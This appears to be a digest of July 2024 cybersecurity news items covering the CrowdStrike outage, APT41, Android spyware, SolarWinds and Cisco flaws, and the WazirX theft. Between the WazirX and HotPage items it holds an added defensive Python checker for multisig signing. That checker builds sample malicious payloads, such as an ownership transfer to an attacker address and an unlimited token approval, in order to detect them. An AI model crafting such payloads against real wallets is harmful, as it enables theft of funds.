Scattered Spider, an offshoot of a loose-knit group called The Com, has evolved into an initial access broker and affiliate, delivering ransomware families like BlackCat, Qilin, and RansomHub. A recent report from Google-owned Mandiant revealed the attackers' pivot to encryptionless extortion attacks that aim to steal data from software-as-a-service (SaaS) applications.
The development comes as the DoJ announced the sentencing of Scott Raul Esparza, 24, of Texas, to nine months in prison for running a distributed denial-of-service (DDoS) attack solution named Astrostress between 2019 and 2022, following which he is expected to serve two years of supervised release. He pleaded guilty to the charges earlier in March.
"Customers of Astrostress.com were offered various levels of subscriptions – depending on how many attacks they wanted to conduct and with what power – and were charged accordingly," the DoJ said. "This site thus enabled co-conspirators worldwide to set up accounts on Astrostress.com and then use the Astrostress.com resources to direct attacks at internet-connected computers around the globe."
Esparza, who procured the attack servers and maintained the service, is said to have collaborated with Shamar Shattock, 21, of Florida. Shattock faces up to five years in prison after pleading guilty in March 2023.
It also comes in the wake of sanctions imposed by the U.S. Treasury Department against Yuliya Vladimirovna Pankratova and Denis Olegovich Degtyarenko, two members of CyberArmyofRussia_Reborn (CARR), a hacktivist persona tied to the prolific Russia-based Sandworm (aka APT44) group, for engaging in cyber attacks targeting critical infrastructure in the U.S.
Pankratova (aka YUliYA) is believed to be the leader of CARR and its spokesperson, with Degtyarenko (aka Dena) working as the primary hacker for the group and allegedly responsible for the compromise of a Supervisory Control and Data Acquisition (SCADA) system of an unnamed U.S. energy company.
"Using various unsophisticated techniques, CARR has been responsible for manipulating industrial control system equipment at water supply, hydroelectric, wastewater, and energy facilities in the U.S. and Europe," the department's Office of Foreign Assets Control (OFAC) said.
Faulty CrowdStrike Update Crashes Windows Systems, Impacting Businesses Worldwide
19.7.24
Security
The Hacker News
Businesses across the world have been hit by widespread disruptions to their Windows workstations stemming from a faulty update pushed out by cybersecurity company CrowdStrike.
"CrowdStrike is actively working with customers impacted by a defect found in a single content update for Windows hosts," the company's CEO George Kurtz said in a statement. "Mac and Linux hosts are not impacted. This is not a security incident or cyberattack."
The company, which acknowledged "reports of [Blue Screens of Death] on Windows hosts," further said it has identified the issue and a fix has been deployed for its Falcon Sensor product, urging customers to refer to the support portal for the latest updates.
For systems that have been already impacted by the problem, the mitigation instructions are listed below -
Boot Windows in Safe Mode or Windows Recovery Environment
Navigate to the C:\Windows\System32\drivers\CrowdStrike directory
Find the file matching "C-00000291*.sys" and delete it
Restart the computer or server normally
It's worth noting that the outage has also impacted Google Cloud Compute Engine,
causing Windows virtual machines using CrowdStrike's csagent.sys to crash and go
into an unexpected reboot state.
"After having automatically received a defective patch from CrowdStrike, Windows VMs crash and will not be able to reboot," it said. "Windows VMs that are currently up and running should no longer be impacted."
Security researcher Kevin Beaumont said "I have obtained the Crowdstrike driver they pushed via auto update. I don't know how it happened, but the file isn't a validly formatted driver and causes Windows to crash every time."
"Crowdstrike is the top tier EDR product, and is on everything from point of sale to ATMs etc – this will be the biggest 'cyber' incident worldwide ever in terms of impact, most likely."
Airlines, financial institutions, food and retail chains, hospitals, hotels, news organizations, railway networks, and telecom firms are among the many businesses affected. Shares of CrowdStrike have tanked 15% in U.S. premarket trading.
"The current event appears – even in July – that it will be one of the most significant cyber issues of 2024," Omer Grossman, Chief Information Officer (CIO) at CyberArk, said in a statement shared with The Hacker News. "The damage to business processes at the global level is dramatic. The glitch is due to a software update of CrowdStrike's EDR product."
"This is a product that runs with high privileges that protects endpoints. A malfunction in this can, as we are seeing in the current incident, cause the operating system to crash."
The recovery is expected to take days as the problem needs to be solved manually, endpoint by endpoint, by starting them in Safe Mode and removing the buggy driver, Grossman pointed out, adding the root cause behind the malfunction will be of the "utmost interest."
Jake Moore, global security advisor at Slovakian cybersecurity company ESET, told The Hacker News that the incident highlights the need to have multiple "fail safes" in place and to diversify IT infrastructure.
"Upgrades and maintenance to systems and networks can unintentionally include small errors, which can have wide-reaching consequences as experienced today by Crowdstrike's customers," Moore said.
"Another aspect of this incident relates to 'diversity' in the use of large-scale IT infrastructure. This applies to critical systems like operating systems (OSes), cybersecurity products, and other globally deployed (scaled) applications. Where diversity is low, a single technical incident, not to mention a security issue, can lead to global-scale outages with subsequent knock-on effects."
The development comes as Microsoft is recovering from a separate outage of its own that caused issues with Microsoft 365 apps and services, including Defender, Intune, OneNote, OneDrive for Business, SharePoint Online, Windows 365, Viva Engage, and Purview.
"A configuration change in a portion of our Azure backend workloads, caused interruption between storage and compute resources which resulted in connectivity failures that affected downstream Microsoft 365 services dependent on these connections," the tech giant said.
Pro-Houthi Group Targets Yemen Aid Organizations with Android Spyware
19.7.24
Virus
The Hacker News
A suspected pro-Houthi threat group targeted at least three humanitarian organizations in Yemen with Android spyware designed to harvest sensitive information.
These attacks, attributed to an activity cluster codenamed OilAlpha, entail a new set of malicious mobile apps that come with their own supporting infrastructure, Recorded Future's Insikt Group said.
Targets of the ongoing campaign include CARE International, the Norwegian Refugee Council (NRC), and the Saudi Arabian King Salman Humanitarian Aid and Relief Centre.
"The OilAlpha threat group is highly likely active and executing targeted activity against humanitarian and human rights organizations operating in Yemen, and potentially throughout the Middle East," the cybersecurity company said.
OilAlpha was first documented in May 2023 in connection with an espionage campaign targeting development, humanitarian, media, and non-governmental organizations in the Arabian peninsula.
These attacks leveraged WhatsApp to distribute malicious Android APK files by passing them off as associated with legitimate organizations like UNICEF, ultimately leading to the deployment of a malware strain named SpyNote (aka SpyMax).
The latest wave, identified in early June 2024, comprises apps that claim to be
related to humanitarian relief programs and masquerade as entities like CARE
International and the NRC, both of which have an active presence in Yemen.
Once installed, these apps – which harbor the SpyMax trojan – request intrusive permissions, thereby facilitating the theft of victim data.
OilAlpha's operations also include a credential harvesting component that uses a set of fake login pages impersonating these organizations to capture users' login information. The goal is suspected to be espionage through access to accounts associated with the affected organizations.
"Houthi militants have continually sought to restrict the movement and delivery of international humanitarian assistance and have profited from taxing and re-selling aid materials," Recorded Future said.
"One possible explanation for the observed cyber targeting is that it is intelligence-gathering to facilitate efforts to control who gets aid and how it is delivered."
The development arrives weeks after Lookout implicated a Houthi-aligned threat actor in another surveillanceware operation that delivers an Android data-gathering tool called GuardZoo to targets in Yemen and other countries in the Middle East.
APT41 Infiltrates Networks in Italy, Spain, Taiwan, Turkey, and the U.K.
19.7.24
APT
The Hacker News
Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a "sustained campaign" by the prolific China-based APT41 hacking group.
"APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since 2023, enabling them to extract sensitive data over an extended period," Google-owned Mandiant said in a new report published Thursday.
The threat intelligence firm described the adversarial collective as unique among China-nexus actors owing to its use of "non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions."
Attack chains involve the use of web shells (ANTSWORD and BLUEBEAM), custom droppers (DUSTPAN and DUSTTRAP), and publicly available tools (SQLULDR2 and PINEGROVE) to achieve persistence, deliver additional payloads, and exfiltrate data of interest.
The web shells act as a conduit to download the DUSTPAN (aka StealthVector) dropper that's responsible for loading Cobalt Strike Beacon for command-and-control (C2) communication, followed by the deployment of the DUSTTRAP dropper post lateral movement.
DUSTTRAP, for its part, is configured to decrypt a malicious payload and execute it in memory, which, in turn, establishes contact with an attacker-controlled server or a compromised Google Workspace account in an attempt to conceal its malicious activities.
Google said the identified Workspace accounts have been remediated to prevent unauthorized access. It, however, did not reveal how many accounts were affected.
The intrusions are also characterized by the use of SQLULDR2 to export data from Oracle Databases to a local text-based file and PINEGROVE to transmit large volumes of sensitive data from compromised networks by abusing Microsoft OneDrive as an exfiltration vector.
It's worth noting here that the malware families that Mandiant tracks as DUSTPAN and DUSTTRAP share overlaps with those that have been codenamed DodgeBox and MoonWalk, respectively, by Zscaler ThreatLabz.
"DUSTTRAP is a multi-stage plugin framework with multiple components," Mandiant researchers said, adding it identified at least 15 plugins that are capable of executing shell commands, carrying out file system operations, enumerating and terminating processes, capturing keystrokes and screenshots, gathering system information, and modifying the Windows Registry.
It's also engineered to probe remote hosts, perform domain name system (DNS) lookups, list remote desktop sessions, upload files, and conduct various manipulations to Microsoft Active Directory.
"The DUSTTRAP malware and its associated components that were observed during the intrusion were code signed with presumably stolen code signing certificates," the company said. "One of the code signing certificates seemed to be related to a South Korean company operating in the gaming industry sector."
GhostEmperor Comes Back to Haunt
The disclosure comes as Israeli cybersecurity company Sygnia revealed details of a cyber attack campaign mounted by a sophisticated China-nexus threat group called GhostEmperor to deliver a variant of the Demodex rootkit.
The exact method used to breach targets is currently not clear, although the group has been previously observed exploiting known flaws in internet-facing applications. The initial access facilitates the execution of a Windows batch script, which drops a Cabinet archive (CAB) file to ultimately launch a core implant module.
The implant is equipped to manage C2 communications and install the Demodex kernel rootkit by using an open-source project named Cheat Engine to get around the Windows Driver Signature Enforcement (DSE) mechanism.
"GhostEmperor employs a multi-stage malware to achieve stealth execution and persistence and utilizes several methods to impede the analysis process," security researcher Dor Nizar said.
SolarWinds Patches 11 Critical Flaws in Access Rights Manager Software
19.7.24
Vulnerability
The Hacker News
SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code.
Of the 13 vulnerabilities, eight are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining five weaknesses have been rated High in severity, with four of them having a CVSS score of 7.6 and one scoring 8.3.
The most severe of the flaws are listed below -
CVE-2024-23472 - SolarWinds ARM Directory Traversal Arbitrary File Deletion and Information Disclosure Vulnerability
CVE-2024-28074 - SolarWinds ARM Internal Deserialization Remote Code Execution Vulnerability
CVE-2024-23469 - SolarWinds ARM Exposed Dangerous Method Remote Code Execution Vulnerability
CVE-2024-23475 - SolarWinds ARM Traversal and Information Disclosure Vulnerability
CVE-2024-23467 - SolarWinds ARM Traversal Remote Code Execution Vulnerability
CVE-2024-23466 - SolarWinds ARM Directory Traversal Remote Code Execution Vulnerability
CVE-2024-23470 - SolarWinds ARM UserScriptHumster Exposed Dangerous Method Remote Command Execution Vulnerability
CVE-2024-23471 - SolarWinds ARM CreateFile Directory Traversal Remote Code Execution Vulnerability
Successful exploitation of the aforementioned vulnerabilities could allow an attacker to read and delete files and execute code with elevated privileges.
The shortcomings have been addressed in version 2024.3 released on July 17, 2024, following responsible disclosure as part of the Trend Micro Zero Day Initiative (ZDI).
The development comes after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a high-severity path traversal flaw in SolarWinds Serv-U (CVE-2024-28995, CVSS score: 8.6) to its Known Exploited Vulnerabilities (KEV) catalog following reports of active exploitation in the wild.
The network security company was the victim of a major supply chain attack in 2020 after the update mechanism associated with its Orion network management platform was compromised by Russian APT29 hackers to distribute malicious code to downstream customers as part of a high-profile cyber espionage campaign.
The breach prompted the U.S. Securities and Exchange Commission (SEC) to file a lawsuit against SolarWinds and its chief information security officer (CISO) last October alleging the company failed to disclose adequate material information to investors regarding cybersecurity risks.
However, many of the claims in the lawsuit were thrown out by the U.S. District Court for the Southern District of New York on July 18, which stated that "these do not plausibly plead actionable deficiencies in the company's reporting of the cybersecurity hack" and that they "impermissibly rely on hindsight and speculation."
WazirX Cryptocurrency Exchange Loses $230 Million in Major Security Breach
19.7.24
Cryptocurrency
The Hacker News
Indian cryptocurrency exchange WazirX has confirmed that it was the target of a security breach that led to the theft of $230 million in cryptocurrency assets.
"A cyber attack occurred in one of our [multi-signature] wallets involving a loss of funds exceeding $230 million," the company said in a statement. "This wallet was operated utilizing the services of Liminal's digital asset custody and wallet infrastructure from February 2023."
The Mumbai-based company said the attack stemmed from a mismatch between the information that was displayed on Liminal's interface and what was actually signed. It said the payload was replaced to transfer wallet control to an attacker.
Crypto custody firm Liminal is one of the six signatories on the wallet and is responsible for transaction verifications.
"Our preliminary investigations show that one of the self custody multi-sig smart contract wallets created outside of the Liminal ecosystem has been compromised," Liminal said in a series of posts shared on X.
"It is also pertinent to note that all WazirX wallets created on the Liminal platform continue to remain secure and protected. Meanwhile, all the malicious transactions to the attacker's addresses have occurred from outside of the Liminal platform."
Blockchain analytics firm Elliptic said the attack has all the hallmarks of North Korean threat actors, and that the attackers have taken the step of swapping the crypto assets for Ether using various decentralized services.
This was also reiterated by crypto researcher ZachXBT on X, who said "the WazirX hack has the potential markings of a Lazarus Group attack (yet again)."
Threat actors affiliated with North Korea have a track record of staging cyber attacks targeting the cryptocurrency sector since at least 2017 as a way to get around international sanctions imposed against the country.
Earlier this year, the United Nations said it was probing 58 suspected intrusions carried out by the nation-state actors between 2017 and 2023 that netted $3 billion in illegal revenues to help it advance its nuclear weapons program.
The disclosure comes against the backdrop of a coordinated law enforcement operation codenamed Spincaster that shut down scam networks making illicit profits off approval phishing, a popular tactic in which funds are stolen through fake crypto apps and romance scams (aka pig butchering). As much as $2.7 billion is estimated to have been stolen using this method since May 2021.
"With the approval phishing technique, the scammer tricks the user into signing a malicious blockchain transaction that gives the scammer's address approval to spend specific tokens inside the victim's wallet, allowing the scammer to then drain the victim's address of those tokens at will," Chainalysis said.
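The WazirX signing mismatch and the approval-phishing pattern quoted above both come down to a signer approving a payload whose decoded content was never compared with what was displayed. As an added example (not code from the article, WazirX, Liminal or Chainalysis), the Python below decodes the raw calldata a multisig signer is about to approve and checks it against the displayed intent; the addresses and amounts are constructed, and the selectors are the standard ones for the named Solidity functions.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Four-byte Solidity function selectors (first 4 bytes of keccak256 of the signature).
SELECTORS = {
    "a9059cbb": "transfer(address,uint256)",
    "095ea7b3": "approve(address,uint256)",
    "f2fde38b": "transferOwnership(address)",
}
# Functions that hand control of a wallet or contract to another party.
CONTROL_TRANSFER = {"transferOwnership(address)"}
UNLIMITED = 2**256 - 1  # the "infinite" allowance that approval phishing asks for


@dataclass
class Intent:
    """What the custody interface displayed to the signer."""
    contract: str            # contract the wallet is supposed to call
    function: str            # e.g. "transfer(address,uint256)"
    counterparty: str        # recipient, spender or new owner that was shown
    amount: Optional[int]    # token amount, None for functions without one


def encode_call(function: str, address: str, amount: Optional[int] = None) -> str:
    """ABI-encode a call taking an address and an optional uint256."""
    selector = next(sel for sel, sig in SELECTORS.items() if sig == function)
    words = [int(address, 16).to_bytes(32, "big")]
    if amount is not None:
        words.append(amount.to_bytes(32, "big"))
    return "0x" + selector + b"".join(words).hex()


def decode_call(calldata: str) -> Tuple[str, str, Optional[int]]:
    """Return (function, address argument, uint256 argument or None)."""
    raw = bytes.fromhex(calldata.removeprefix("0x"))
    if len(raw) < 36 or (len(raw) - 4) % 32:
        raise ValueError("calldata is not a selector plus whole 32-byte words")
    function = SELECTORS.get(raw[:4].hex(), "unknown")
    words = [raw[i:i + 32] for i in range(4, len(raw), 32)]
    if any(words[0][:12]):  # an address is right-aligned in its 32-byte word
        raise ValueError("first argument is not a well-formed address")
    address = "0x" + words[0][-20:].hex()
    amount = int.from_bytes(words[1], "big") if len(words) > 1 else None
    return function, address, amount


def check_before_signing(intent: Intent, tx: dict) -> List[str]:
    """Reasons to refuse the signature; an empty list means UI and payload agree."""
    findings = []
    if tx["to"].lower() != intent.contract.lower():
        findings.append(f"target contract differs: {tx['to']}")
    function, address, amount = decode_call(tx["data"])
    if function != intent.function:
        findings.append(f"function differs: shown {intent.function}, signing {function}")
    if address.lower() != intent.counterparty.lower():
        findings.append(f"counterparty differs: {address}")
    if amount != intent.amount:
        findings.append(f"amount differs: {amount}")
    # Policy checks that apply even when the display and the payload agree.
    if function in CONTROL_TRANSFER:
        findings.append("payload hands wallet control to another address")
    if function == "approve(address,uint256)" and amount == UNLIMITED:
        findings.append("unlimited token approval (approval-phishing pattern)")
    return findings


# Constructed sample data: none of these addresses are real.
TOKEN = "0x" + "11" * 20        # token contract the wallet holds
MULTISIG = "0x" + "33" * 20     # the multisig wallet contract itself
TREASURY = "0x" + "22" * 20     # legitimate recipient shown in the UI
ATTACKER = "0x" + "ee" * 20

# Displayed: move 1000 tokens (18 decimals) to the treasury.
SHOWN = Intent(TOKEN, "transfer(address,uint256)", TREASURY, 1000 * 10**18)
HONEST_TX = {"to": TOKEN,
             "data": encode_call("transfer(address,uint256)", TREASURY, 1000 * 10**18)}
# Swapped: the queued payload instead hands ownership of the wallet to the attacker.
SWAPPED_TX = {"to": MULTISIG,
              "data": encode_call("transferOwnership(address)", ATTACKER)}
# Approval phishing: display and payload agree, but the payload is an unlimited allowance.
PHISH_INTENT = Intent(TOKEN, "approve(address,uint256)", ATTACKER, UNLIMITED)
PHISH_TX = {"to": TOKEN,
            "data": encode_call("approve(address,uint256)", ATTACKER, UNLIMITED)}

if __name__ == "__main__":
    cases = [("honest", SHOWN, HONEST_TX),
             ("swapped", SHOWN, SWAPPED_TX),
             ("phish", PHISH_INTENT, PHISH_TX)]
    for label, intent, tx in cases:
        print(label, check_before_signing(intent, tx) or ["OK to sign"])
```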
Alert: HotPage Adware Disguised as Ad Blocker Installs Malicious Kernel Driver
18.7.24
Virus
The Hacker News
Cybersecurity researchers have shed light on an adware module that purports to block ads and malicious websites, while stealthily offloading a kernel driver component that grants attackers the ability to run arbitrary code with elevated permissions on Windows hosts.
The malware, dubbed HotPage, gets its name from the eponymous installer ("HotPage.exe"), according to new findings from ESET.
The installer "deploys a driver capable of injecting code into remote processes, and two libraries capable of intercepting and tampering with browsers' network traffic," ESET researcher Romain Dumont said in a technical analysis published today.
"The malware can modify or replace the contents of a requested page, redirect the user to another page, or open a new page in a new tab based on certain conditions."
Besides leveraging its browser traffic interception and filtering capabilities to display game-related ads, it is designed to harvest and exfiltrate system information to a remote server associated with a Chinese company named Hubei Dunwang Network Technology Co., Ltd (湖北盾网网络科技有限公司).
This is accomplished by means of a driver, whose primary objective is to inject the libraries into browser applications and alter their execution flow to change the URL being accessed or ensure that the homepage of the new web browser instance is redirected to a particular URL specified in a configuration.
That's not all. The absence of any access control lists (ACLs) for the driver meant that an attacker with a non-privileged account could leverage it to obtain elevated privileges and run code as the NT AUTHORITY\System account.
"This kernel component unintentionally leaves the door open for other threats to run code at the highest privilege level available in the Windows operating system: the System account," Dumont said. "Due to improper access restrictions to this kernel component, any processes can communicate with it and leverage its code injection capability to target any non-protected processes."
Although the exact method by which the installer is distributed is not known, evidence gathered by the Slovakian cybersecurity firm shows that it has been advertised as a security solution for internet cafés that's intended to improve users' browsing experience by stopping ads.
The embedded driver is notable for the fact that it's signed by Microsoft. The Chinese company is believed to have gone through Microsoft's driver code signing requirements and managed to obtain an Extended Validation (EV) certificate. It has been removed from the Windows Server Catalog as of May 1, 2024.
Kernel-mode drivers have been required to be digitally signed to be loaded by the Windows operating system, an important layer of defense erected by Microsoft to protect against malicious drivers that could be weaponized to subvert security controls and interfere with system processes.
That said, Cisco Talos revealed last July how native Chinese-speaking threat actors are exploiting a Microsoft Windows policy loophole to forge signatures on kernel-mode drivers.
"The analysis of this rather generic-looking piece of malware has proven, once again, that adware developers are still willing to go the extra mile to achieve their goals," Dumont said.
"Not only that, they have developed a kernel component with a large set of techniques to manipulate processes, but they also went through the requirements imposed by Microsoft to obtain a code-signing certificate for their driver component."
SAP AI Core Vulnerabilities Expose Customer Data to Cyber Attacks
18.7.24
AI
The Hacker News
Cybersecurity researchers have uncovered security shortcomings in SAP AI Core, a cloud-based platform for creating and deploying predictive artificial intelligence (AI) workflows, that could be exploited to get hold of access tokens and customer data.
The five vulnerabilities have been collectively dubbed SAPwned by cloud security firm Wiz.
"The vulnerabilities we found could have allowed attackers to access customers' data and contaminate internal artifacts – spreading to related services and other customers' environments," security researcher Hillai Ben-Sasson said in a report shared with The Hacker News.
Following responsible disclosure on January 25, 2024, the weaknesses were addressed by SAP as of May 15, 2024.
In a nutshell, the flaws make it possible to obtain unauthorized access to customers' private artifacts and credentials to cloud environments like Amazon Web Services (AWS), Microsoft Azure, and SAP HANA Cloud.
They could also be used to modify Docker images on SAP's internal container registry, SAP's Docker images on the Google Container Registry, and artifacts hosted on SAP's internal Artifactory server, resulting in a supply chain attack on SAP AI Core services.
Furthermore, the access could be weaponized to gain cluster administrator privileges on SAP AI Core's Kubernetes cluster by taking advantage of the fact that the Helm package manager server was exposed to both read and write operations.
"Using this access level, an attacker could directly access other customers' Pods and steal sensitive data, such as models, datasets, and code," Ben-Sasson explained. "This access also allows attackers to interfere with customers' Pods, taint AI data and manipulate models' inference."
Wiz said the issues arise due to the platform making it feasible to run malicious AI models and training procedures without adequate isolation and sandboxing mechanisms.
"The recent security flaws in AI service providers like Hugging Face, Replicate, and SAP AI Core highlight significant vulnerabilities in their tenant isolation and segmentation implementations," Ben-Sasson told The Hacker News. "These platforms allow users to run untrusted AI models and training procedures in shared environments, increasing the risk of malicious users being able to access other users' data."
"Unlike veteran cloud providers who have vast experience with tenant-isolation practices and use robust isolation techniques like virtual machines, these newer services often lack this knowledge and rely on containerization, which offers weaker security. This underscores the need to raise awareness of the importance of tenant isolation and to push the AI service industry to harden their environments."
As a result, a threat actor could create a regular AI application on SAP AI Core, bypass network restrictions, and probe the Kubernetes Pod's internal network to obtain AWS tokens and access customer code and training datasets by exploiting misconfigurations in AWS Elastic File System (EFS) shares.
"People should be aware that AI models are essentially code. When running AI models on your own infrastructure, you could be exposed to potential supply chain attacks," Ben-Sasson said.
"Only run trusted models from trusted sources, and properly separate between external models and sensitive infrastructure. When using AI services providers, it's important to verify their tenant-isolation architecture and ensure they apply best practices."
The findings come as Netskope revealed that the growing enterprise use of generative AI has prompted organizations to use blocking controls, data loss prevention (DLP) tools, real-time coaching, and other mechanisms to mitigate risk.
"Regulated data (data that organizations have a legal duty to protect) makes up more than a third of the sensitive data being shared with generative AI (genAI) applications — presenting a potential risk to businesses of costly data breaches," the company said.
They also follow the emergence of a new cybercriminal threat group called NullBulge that has trained its sights on AI- and gaming-focused entities since April 2024 with an aim to steal sensitive data and sell compromised OpenAI API keys in underground forums while claiming to be a hacktivist crew "protecting artists around the world" against AI.
"NullBulge targets the software supply chain by weaponizing code in publicly available repositories on GitHub and Hugging Face, leading victims to import malicious libraries, or through mod packs used by gaming and modeling software," SentinelOne security researcher Jim Walter said.
"The group uses tools like AsyncRAT and XWorm before delivering LockBit payloads built using the leaked LockBit Black builder. Groups like NullBulge represent the ongoing threat of low-barrier-of-entry ransomware, combined with the evergreen effect of info-stealer infections."
TAG-100: New Threat Actor Uses Open-Source Tools for Widespread Attacks
18.7.24
APT
The Hacker News
Unknown threat actors have been observed leveraging open-source tools as part of a suspected cyber espionage campaign targeting global government and private sector organizations.
Recorded Future's Insikt Group is tracking the activity under the temporary moniker TAG-100, noting that the adversary likely compromised organizations in at least ten countries across Africa, Asia, North America, South America, and Oceania, including two unnamed Asia-Pacific intergovernmental organizations.
Also singled out since February 2024 are diplomatic, government, semiconductor supply-chain, non-profit, and religious entities located in Cambodia, Djibouti, the Dominican Republic, Fiji, Indonesia, Netherlands, Taiwan, the U.K., the U.S., and Vietnam.
"TAG-100 employs open-source remote access capabilities and exploits various internet-facing devices to gain initial access," the cybersecurity company said. "The group used open-source Go backdoors Pantegana and Spark RAT post-exploitation."
Attack chains involve the exploitation of known security flaws impacting various internet-facing products, including Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange Server, SonicWall, Cisco Adaptive Security Appliances (ASA), Palo Alto Networks GlobalProtect, and Fortinet FortiGate.
The group has also been observed conducting wide-ranging reconnaissance activity aimed at internet-facing appliances belonging to organizations in at least fifteen countries, including Cuba, France, Italy, Japan, and Malaysia. This also included several Cuban embassies located in Bolivia, France, and the U.S.
"Beginning on April 16, 2024, TAG-100 conducted probable reconnaissance and exploitation activity targeting Palo Alto Networks GlobalProtect appliances of organizations, mostly based in the U.S., within the education, finance, legal, local government, and utilities sectors," the company said.
This effort is said to have coincided with the public release of a proof-of-concept (PoC) exploit for CVE-2024-3400 (CVSS score: 10.0), a critical remote code execution vulnerability affecting Palo Alto Networks GlobalProtect firewalls.
Successful initial access is followed by the deployment of Pantegana, Spark RAT, and Cobalt Strike Beacon on compromised hosts.
The findings illustrate how PoC exploits can be combined with open-source programs to orchestrate attacks, effectively lowering the barrier to entry for less sophisticated threat actors. Furthermore, such tradecraft enables adversaries to complicate attribution efforts and evade detection.
"The widespread targeting of internet-facing appliances is particularly attractive because it offers a foothold within the targeted network via products that often have limited visibility, logging capabilities, and support for traditional security solutions, reducing the risk of detection post-exploitation," Recorded Future said.
Meta Halts AI Use in Brazil Following Data Protection Authority's Ban
18.7.24
AI
The Hacker News
Meta has suspended the use of generative artificial intelligence (GenAI) in Brazil after the country's data protection authority issued a preliminary ban objecting to its new privacy policy.
The development was first reported by news agency Reuters.
The company said it has decided to suspend the tools while it is in talks with Brazil's National Data Protection Authority (ANPD) to address the agency's concerns over its use of GenAI technology.
Earlier this month, ANPD halted with immediate effect the social media giant's new privacy policy that granted the company access to users' personal data to train its GenAI systems.
The decision stems from "the imminent risk of serious and irreparable damage or difficult-to-repair damage to the fundamental rights of the affected data subjects," the agency said.
It further set a daily fine of 50,000 reais (about $9,100 as of July 18) in case of non-compliance. Last week, it gave Meta "five more days to prove compliance with the decision."
In response, Meta said it was "disappointed" by ANPD's decision and that the move constitutes "a step backwards for innovation, competition in AI development and further delays bringing the benefits of AI to people in Brazil."
The use of personal data to train AI systems without users' express consent or knowledge has raised privacy concerns, forcing U.S.-based tech giants to pause the rollout of their tools in regions with stricter data privacy laws, such as the European Union.
Human Rights Watch reported in June how personal photos of Brazilian children have found their way into image caption datasets like LAION-5B, exposing them to further exploitation and harm through the facilitation of malicious deepfakes.
Apple, which announced a new AI system called Apple Intelligence last month, has said it won't be bringing the features to Europe this year due to the prevailing regulatory concerns arising from the Digital Markets Act (DMA).
"We are concerned that the interoperability requirements of the DMA could force us to compromise the integrity of our products in ways that risk user privacy and data security," Apple was quoted as saying to The Wall Street Journal.
Meta has since confirmed to Axios that it will also be withholding its upcoming multimodal AI models from customers in the region because of the "unpredictable nature of the European regulatory environment."
Cisco Warns of Critical Flaw Affecting On-Prem Smart Software Manager
18.7.24
Vulnerability
The Hacker News
Cisco has released patches to address a maximum-severity security flaw impacting Smart Software Manager On-Prem (Cisco SSM On-Prem) that could enable a remote, unauthenticated attacker to change the password of any user, including administrative users.
The vulnerability, tracked as CVE-2024-20419, carries a CVSS score of 10.0.
"This vulnerability is due to improper implementation of the password-change process," the company said in an advisory. "An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user."
The shortcoming affects Cisco SSM On-Prem versions 8-202206 and earlier. It has been fixed in version 8-202212. It's worth noting that version 9 is not susceptible to the flaw.
Cisco said there are no workarounds that resolve the issue, and that it's not aware of any malicious exploitation in the wild. Security researcher Mohammed Adel has been credited with discovering and reporting the bug.
Also fixed by the networking equipment maker is another critical file write vulnerability in Secure Email Gateway (CVE-2024-20401, CVSS score: 9.8) that lets attackers add new users with root privileges and permanently crash the appliances using emails with malicious attachments.
"An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device," it noted. "A successful exploit could allow the attacker to replace any file on the underlying file system."
"The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial-of-service (DoS) condition on the affected device."
The flaw affects SEG devices if they are running a vulnerable release of Cisco AsyncOS and if the following prerequisites are met -
The file analysis feature (part of Cisco Advanced Malware Protection) or the content filter feature is enabled and assigned to an incoming mail policy
The Content Scanner Tools version is earlier than 23.3.0.4823
A patch for CVE-2024-20401 is available via Content Scanner Tools package versions 23.3.0.4823 and later, which is included by default in Cisco AsyncOS for Cisco Secure Email Software releases 15.5.1-055 and later.
CISA Adds 3 Flaws to KEV Catalog
The disclosure comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation -
CVE-2024-34102 (CVSS score: 9.8) - Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability
CVE-2024-28995 (CVSS score: 8.6) - SolarWinds Serv-U Path Traversal Vulnerability
CVE-2022-22948 (CVSS score: 6.5) - VMware vCenter Server Incorrect Default File Permissions Vulnerability
CVE-2024-34102, which is also referred to as CosmicSting, is a severe security flaw arising from improper handling of nested deserialization, allowing attackers to achieve remote code execution. A proof-of-concept (PoC) exploit for the flaw was released by Assetnote late last month.
Reports about the exploitation of CVE-2024-28995, a directory traversal vulnerability that could enable access to sensitive files on the host machine, were detailed by GreyNoise, including attempts to read files such as /etc/passwd.
The abuse of CVE-2022-22948, on the other hand, has been attributed by Google-owned Mandiant to a China-nexus cyber espionage group known as UNC3886, which has a history of leveraging zero-day flaws in Fortinet, Ivanti, and VMware appliances.
Federal agencies are required to apply mitigations per vendor instructions by August 7, 2024, to secure their networks against active threats.
North Korean Hackers Update BeaverTail Malware to Target macOS Users
18.7.24
APT
The Hacker News
Cybersecurity researchers have discovered an updated variant of a known stealer malware that attackers affiliated with the Democratic People's Republic of Korea (DPRK) have delivered as part of prior cyber espionage campaigns targeting job seekers.
The artifact in question is an Apple macOS disk image (DMG) file named "MiroTalk.dmg" that mimics the legitimate video call service of the same name, but, in reality, serves as a conduit to deliver a native version of BeaverTail, security researcher Patrick Wardle said.
BeaverTail refers to a JavaScript stealer malware that was first documented by Palo Alto Networks Unit 42 in November 2023 as part of a campaign dubbed Contagious Interview that aims to infect software developers with malware through a supposed job interview process. Securonix is tracking the same activity under the moniker DEV#POPPER.
Besides siphoning sensitive information from web browsers and crypto wallets, the malware is capable of delivering additional payloads like InvisibleFerret, a Python backdoor that's responsible for downloading AnyDesk for persistent remote access.
While BeaverTail has been distributed via bogus npm packages hosted on GitHub and the npm package registry, the latest findings mark a shift in the distribution vector.
